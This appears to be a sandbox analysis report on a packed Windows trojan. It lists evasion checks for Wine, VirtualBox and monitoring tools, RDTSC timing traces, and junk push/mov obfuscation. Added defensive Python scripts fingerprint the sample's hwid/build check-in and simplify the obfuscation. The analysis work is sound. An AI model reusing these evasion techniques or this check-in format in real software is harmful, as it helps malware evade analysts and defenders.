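The check-in above is plain HTTP: a multipart/form-data POST to the .php endpoint carrying only two fields, hwid and build, and the boundary is "----" followed by characters drawn from the decrypted alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890. Both traits are visible in the decrypted strings, so they can be checked on the wire without a family-specific signature. The script below is an added example for this report, not Joe Sandbox code and not the sample's code: it decodes the Data Raw hex copied from the captured request, parses the form with a small hand-written multipart parser, and reports which traits the request carries. The benign request used for comparison is constructed.

```python
"""Decode and fingerprint the multipart check-in captured in this report."""
import re

# Copied from the captured POST above (Content-Type header and Data Raw hex dump).
CAPTURED_CONTENT_TYPE = "multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF"
CAPTURED_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "30 36 30 38 34 46 37 43 45 39 30 33 32 30 34 39 37 30 30 37 35 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "74 61 6c 65 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a"
)

# Constructed benign upload for comparison: browser-style boundary, different field set.
BENIGN_CONTENT_TYPE = "multipart/form-data; boundary=----WebKitFormBoundaryabc123"
BENIGN_BODY = (
    b"------WebKitFormBoundaryabc123\r\n"
    b'Content-Disposition: form-data; name="username"\r\n\r\nalice\r\n'
    b"------WebKitFormBoundaryabc123--\r\n"
)

# Traits taken from the decrypted strings: "boundary=----", the boundary alphabet,
# and the field names hwid/build.
BOUNDARY_PREFIX = "----"
BOUNDARY_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")
CHECKIN_FIELDS = {"hwid", "build"}


def captured_body() -> bytes:
    """The 210-byte body from the capture, decoded from its hex dump."""
    return bytes.fromhex(CAPTURED_BODY_HEX)


def parse_multipart(content_type: str, body: bytes):
    """Minimal multipart/form-data parser: returns (boundary, {field_name: value_bytes})."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    boundary = m.group(2)
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    # Parts sit between delimiters; the first split element is the (empty) preamble.
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter: --boundary--
            break
        head, sep, value = chunk.removeprefix(b"\r\n").partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part lacks the blank line between headers and body")
        name = None
        for line in head.split(b"\r\n"):
            hname, _, hval = line.partition(b":")
            if hname.strip().lower() == b"content-disposition":
                nm = re.search(rb'name="([^"]*)"', hval)
                name = nm.group(1).decode("ascii") if nm else None
        if name is None:
            raise ValueError("part without a Content-Disposition name")
        fields[name] = value.removesuffix(b"\r\n")   # CRLF belongs to the next delimiter
    return boundary, fields


def fingerprint(content_type: str, body: bytes) -> dict:
    """Decode the form and list which check-in traits from the decrypted strings it shows."""
    boundary, raw_fields = parse_multipart(content_type, body)
    fields = {k: v.decode("latin-1") for k, v in raw_fields.items()}
    indicators = []
    rand = boundary[len(BOUNDARY_PREFIX):]
    if boundary.startswith(BOUNDARY_PREFIX) and rand and set(rand) <= BOUNDARY_ALPHABET:
        indicators.append("boundary is '----' followed only by [A-Z0-9]")
    if set(fields) == CHECKIN_FIELDS:
        indicators.append("form carries exactly the hwid and build fields")
    return {"boundary": boundary, "fields": fields, "indicators": indicators}


if __name__ == "__main__":
    print(fingerprint(CAPTURED_CONTENT_TYPE, captured_body()))
    print(fingerprint(BENIGN_CONTENT_TYPE, BENIGN_BODY))
```

Two points worth keeping in mind when turning this into a network rule: the preceding GET / to the same host carries no distinguishing body, so the POST is the place to match, and the hwid value is per-victim, so match on the field set and boundary shape rather than on the value.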

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code functions (52): 0_2_005CC033, 0_2_005D6024, 0_2_001C0098, 0_2_0052E0DE, 0_2_005B8089, 0_2_001B2138, 0_2_005DF102, 0_2_001DB198, 0_2_005DB26C, 0_2_001EE258, 0_2_001C4288, 0_2_0020B308, 0_2_005DD329, 0_2_001FD39E, 0_2_0064F3F2, 0_2_005C54A6, 0_2_005CF505, 0_2_001AE544, 0_2_001A4573, 0_2_001C45A8, 0_2_001ED5A8, 0_2_004DB5A7, 0_2_001FA648, 0_2_005D96D5, 0_2_001C66C8, 0_2_002096FD, 0_2_001DD720, 0_2_001F6799, 0_2_0052D78C, 0_2_0053F835, 0_2_001D4868, 0_2_001D98B8, 0_2_001DB8A8, 0_2_001EF8D6, 0_2_0059690C, 0_2_005CD9F1, 0_2_00480990, 0_2_005D2A75, 0_2_00532ABF, 0_2_001F0B88, 0_2_001F4BA8, 0_2_001FAC28, 0_2_006AFCEE, 0_2_0056FC8A, 0_2_001EAD38, 0_2_001B1D78, 0_2_001DBD68, 0_2_001D5DB9, 0_2_001D4DC8, 0_2_001C8E78, 0_2_001F1EE8, 0_2_005D0F92
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00184610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: fefgvzwf ZLIB complexity 0.9950002834038694
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00193970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Z2KV232P.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded (20): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2131968 > 1048576
Source: file.exe | Static PE information: Raw size of fefgvzwf is bigger than: 0x100000 < 0x19d800
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.180000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fefgvzwf:EW;bzufikti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fefgvzwf:EW;bzufikti:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x216f66 should be: 0x20989c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: fefgvzwf
Source: file.exe | Static PE information: section name: bzufikti
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B6022 push 7A87A743h; mov dword ptr [esp], eax (at 0_2_006B6048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 6D408F3Fh; mov dword ptr [esp], ebp (at 0_2_005CC0D3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ebp; mov dword ptr [esp], 39ED2AA2h (at 0_2_005CC0E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push esi; mov dword ptr [esp], 69324C16h (at 0_2_005CC16E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 4FA1C48Ch; mov dword ptr [esp], edx (at 0_2_005CC19B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push eax; mov dword ptr [esp], 6B37CEACh (at 0_2_005CC226)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 2FE8686Ah; mov dword ptr [esp], ecx (at 0_2_005CC28C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push edx; mov dword ptr [esp], eax (at 0_2_005CC2F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ebx; mov dword ptr [esp], esi (at 0_2_005CC350)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push eax; mov dword ptr [esp], 44C22BD0h (at 0_2_005CC3F4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 03A6403Bh; mov dword ptr [esp], edx (at 0_2_005CC56B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push edx; mov dword ptr [esp], 1C6FEE32h (at 0_2_005CC571)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push esi; mov dword ptr [esp], ecx (at 0_2_005CC658)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push edi; mov dword ptr [esp], ebx (at 0_2_005CC66B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 01BACB50h; mov dword ptr [esp], esi (at 0_2_005CC69E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 74F44545h; mov dword ptr [esp], ebp (at 0_2_005CC6DD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push esi; mov dword ptr [esp], 0317CC5Ah (at 0_2_005CC71E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ebx; mov dword ptr [esp], 7BBFBE9Ch (at 0_2_005CC79D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 0B0DADB2h; mov dword ptr [esp], edx (at 0_2_005CC81C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push edi; mov dword ptr [esp], 5EFF3A01h (at 0_2_005CC83B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ecx; mov dword ptr [esp], edi (at 0_2_005CC867)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 0E8C3DAFh; mov dword ptr [esp], esi (at 0_2_005CC88A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ebx; mov dword ptr [esp], eax (at 0_2_005CC8B3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 3581106Dh; mov dword ptr [esp], ebx (at 0_2_005CC8BD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push edx; mov dword ptr [esp], ebp (at 0_2_005CC9B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push eax; mov dword ptr [esp], 2BAD7DE1h (at 0_2_005CC9EB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push ebx; mov dword ptr [esp], edi (at 0_2_005CCA5C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 020B9A60h; mov dword ptr [esp], edx (at 0_2_005CCA64)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 4E504852h; mov dword ptr [esp], ebp (at 0_2_005CCAED)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push 360FFDE2h; mov dword ptr [esp], edi (at 0_2_005CCB88)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC033 push esi; mov dword ptr [esp], ecx (at 0_2_005CCB8C)
Source: file.exe | Static PE information: section name: fefgvzwf entropy: 7.95427162698335
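Every "push X; mov dword ptr [esp], Y" pair listed above is a dead-store disguise for a plain "push Y": the push reserves the slot and writes X, the mov immediately overwrites it with Y, and nothing reads X in between. Neither instruction touches EFLAGS, so the pair can be rewritten without changing program state. The script below is an added example, not Joe Sandbox code and not the sample's code; its input lines are copied from the report, and it refuses the one operand (esp as the mov source) for which the rewrite is not equivalent.

```python
"""Collapse 'push X; mov dword ptr [esp], Y' pairs from the report into plain pushes."""
import re

# Instruction pairs copied from the Data Obfuscation findings above.
REPORT_PAIRS = [
    "push 7A87A743h; mov dword ptr [esp], eax",
    "push 6D408F3Fh; mov dword ptr [esp], ebp",
    "push ebp; mov dword ptr [esp], 39ED2AA2h",
    "push esi; mov dword ptr [esp], 69324C16h",
    "push edx; mov dword ptr [esp], eax",
    "push ebx; mov dword ptr [esp], esi",
]

# MASM-style hex immediate (…h) or a 32-bit general purpose register.
OPERAND = r"[0-9A-Fa-f]+h|e[a-d]x|e[sd]i|e[bs]p"
PAIR_RE = re.compile(
    rf"push\s+(?P<first>{OPERAND})\s*;\s*mov\s+dword\s+ptr\s+\[esp\]\s*,\s*(?P<second>{OPERAND})",
    re.IGNORECASE,
)


def simplify(pair: str) -> str:
    """Return the single push equivalent to the obfuscated pair."""
    m = PAIR_RE.fullmatch(pair.strip())
    if m is None:
        raise ValueError(f"not a push/mov-[esp] pair: {pair!r}")
    second = m.group("second")
    if second.lower() == "esp":
        # After the push, esp already points at the new slot, so [esp] receives the
        # post-push value, whereas 'push esp' stores the pre-push value. Not equivalent.
        raise ValueError("mov [esp], esp is not a plain push; leave it alone")
    # The first operand is dead: written by the push, overwritten by the mov, never read.
    return f"push {second}"


def simplify_listing(lines):
    """Rewrite every pair; returns (simplified_lines, number_of_junk_immediates_dropped)."""
    out, dropped = [], 0
    for line in lines:
        m = PAIR_RE.fullmatch(line.strip())
        if m and m.group("first").lower().endswith("h"):
            dropped += 1          # a constant that only existed to look meaningful
        out.append(simplify(line))
    return out, dropped


if __name__ == "__main__":
    simplified, dropped = simplify_listing(REPORT_PAIRS)
    for before, after in zip(REPORT_PAIRS, simplified):
        print(f"{before:45s} => {after}")
    print(f"{dropped} junk immediates removed")
```

Running the report's pairs through this rewrite shows that 0_2_005CC033 is, underneath, an ordinary sequence of register and immediate pushes; the random-looking constants never reach memory that is later read, which is why they should be ignored when hunting for real keys or hashes in the function.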

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-36549)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46E39D second address: 46DBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC070C93707h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC070C93704h 0x00000011 nop 0x00000012 jmp 00007FC070C936FEh 0x00000017 push dword ptr [ebp+122D0571h] 0x0000001d jns 00007FC070C936FCh 0x00000023 call dword ptr [ebp+122D273Eh] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ebx, dword ptr [ebp+122D2A99h] 0x00000031 movzx ebx, bx 0x00000034 popad 0x00000035 pushad 0x00000036 mov esi, dword ptr [ebp+122D2BADh] 0x0000003c mov esi, dword ptr [ebp+122D29FDh] 0x00000042 popad 0x00000043 xor eax, eax 0x00000045 stc 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a xor dword ptr [ebp+122D1D52h], ecx 0x00000050 jne 00007FC070C93708h 0x00000056 mov dword ptr [ebp+122D2BD9h], eax 0x0000005c jmp 00007FC070C93705h 0x00000061 mov dword ptr [ebp+122D1D52h], eax 0x00000067 mov esi, 0000003Ch 0x0000006c jmp 00007FC070C936FEh 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 jmp 00007FC070C936FAh 0x0000007a lodsw 0x0000007c jmp 00007FC070C93703h 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 jne 00007FC070C93710h 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jg 00007FC070C93714h 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 push edx 0x00000099 jmp 00007FC070C936FFh 0x0000009e pop edx 0x0000009f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46DBA3 second address: 46DBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2A4A second address: 5E2A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC070C93708h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2A6B second address: 5E2A71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2CF6 second address: 5E2D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070C936FAh 0x00000008 jg 00007FC070C936F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E6798 second address: 5E679D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E679D second address: 5E67B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jc 00007FC070C936F6h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E67B2 second address: 5E67D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC0712A538Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E67D7 second address: 5E67DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E686D second address: 5E6906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 5271BE3Fh 0x0000000d mov edx, dword ptr [ebp+122D2989h] 0x00000013 or edi, dword ptr [ebp+122D2B29h] 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+122D1F29h], ecx 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D1E21h], ebx 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D3254h], edi 0x00000031 push 6059E3D9h 0x00000036 jg 00007FC0712A5394h 0x0000003c pushad 0x0000003d jns 00007FC0712A5386h 0x00000043 jc 00007FC0712A5386h 0x00000049 popad 0x0000004a add dword ptr [esp], 5FA61C27h 0x00000051 jmp 00007FC0712A5390h 0x00000056 lea ebx, dword ptr [ebp+1244C6E2h] 0x0000005c mov edx, dword ptr [ebp+122D2CA1h] 0x00000062 xchg eax, ebx 0x00000063 jmp 00007FC0712A538Bh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FC0712A5399h 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6970 second address: 5E69BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a or ebx, 3DE8ED85h 0x00000010 add dword ptr [ebp+122D1D52h], esi 0x00000016 popad 0x00000017 sub dword ptr [ebp+122D1BD2h], ecx 0x0000001d push 00000000h 0x0000001f jmp 00007FC070C93709h 0x00000024 call 00007FC070C936F9h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC070C936FAh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E69BD second address: 5E69E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jne 00007FC0712A5386h 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E69E2 second address: 5E69E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A6D second address: 605A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC0712A538Bh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007FC0712A538Dh 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A8F second address: 605A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605A94 second address: 605AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D3B second address: 605D45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC070C93702h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D45 second address: 605D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC0712A5386h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FC0712A5386h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D5A second address: 605D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FC070C93702h 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 jmp 00007FC070C93701h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606055 second address: 60606C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC0712A538Ch 0x00000008 pushad 0x00000009 je 00007FC0712A5386h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60606C second address: 6060B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C93705h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC070C93705h 0x00000012 push ebx 0x00000013 jmp 00007FC070C93700h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606364 second address: 606368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606368 second address: 60636E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60636E second address: 6063A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jns 00007FC0712A5393h 0x0000000e jmp 00007FC0712A5395h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6064D9 second address: 6064E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6064E1 second address: 606505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FC0712A5386h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 je 00007FC0712A5397h 0x00000017 jmp 00007FC0712A538Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067C2 second address: 6067CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067CE second address: 6067D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067D4 second address: 6067DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
